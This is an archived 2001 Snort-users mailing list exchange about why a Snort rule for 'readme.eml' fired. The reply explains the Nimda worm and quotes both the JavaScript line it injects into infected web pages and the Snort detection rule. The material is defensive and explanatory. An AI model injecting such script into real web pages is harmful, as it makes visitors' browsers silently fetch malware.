OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Tim Kramer (kramertmlrnoc.navy.mil)
Date: Fri Nov 02 2001 - 21:07:55 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Dan,

    The "readme.eml" rule (in this case) was probably written
    in response to the Nimda worm which infects web servers so
    that they have an extra line of HMTL/JavaScript code at the
    bottom of the web page. The additional code causes a new
    browser window to be opened will off the visible portion of
    the desktop (location 6000,6000) and to download a file
    called "readme.eml". The actual code that gets added to the
    webpage looks like (without the proper JavaScript tags):

    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

    The act of visiting the infected website causes an additional
    HTTP request. This also makes it easy to detect (via Snort)
    and/or easy to block (via Squid).

    Hope this helps,
    Tim Kramer

    On Fri, 2001-11-02 at 13:21, dan.ellissophos.com wrote:
    > Hi,
    >
    > I'm not actually a snort user, but I'm trying to respond to a log I was
    > sent:
    >
    > Date:01/11 18:43:59 Name:WEB-MISC readme.eml attempt
    > Priority:8 Type:Attempted User Privilege Gain
    > IP info: xxx.xxx.xxx.xxx:80 -> yyy.yyy.yyy.yyy:62689
    > References: 1
    >
    > which apparently came from the rule:
    >
    > Alert tcp $EXTERNAL_NET 80 -> $HOME_NET any \
    > (msg:"WEB-MISC readme.eml attempt"; \
    > flags:A+; uricontent:"readme.eml"; nocase; \
    > classtype:attempted-user; sid:1284; rev:3; \
    > reference:url,www.cert.org/advisories/CA-2001-26.html;)
    >
    > (xxx... is our web server.)
    >
    > I'm not very familiar with snort, but from what I've just read in the
    > documentation the 'uricontent' bit is supposed to match only on
    > the URI of requests. However, this was a response packet from our
    > web server. Of course, several of our pages contain the text "readme.eml",
    > but I don't see how this rule could have triggered unless it was
    > mistakenly matching as 'content' instead of 'uricontent'. Has 'uricontent'
    > been known to misbehave in this way?
    >
    > Any information greatly appreaciated.
    >
    > Regards,
    > Dan.
    >
    >
    > --
    > Dan Ellis, Software Engineer Sophos Anti-Virus
    > email: dan.ellissophos.com http://www.sophos.com
    > US Support: +1 888 SOPHOS 9 UK Support: +44 1235 559933
    >
    >
    > _______________________________________________
    > Snort-users mailing list
    > Snort-userslists.sourceforge.net
    > Go to this URL to change user options or unsubscribe:
    > https://lists.sourceforge.net/lists/listinfo/snort-users
    > Snort-users list archive:
    > http://www.geocrawler.com/redir-sf.php3?list=snort-users

    _______________________________________________
    Snort-users mailing list
    Snort-userslists.sourceforge.net
    Go to this URL to change user options or unsubscribe:
    https://lists.sourceforge.net/lists/listinfo/snort-users
    Snort-users list archive:
    http://www.geocrawler.com/redir-sf.php3?list=snort-users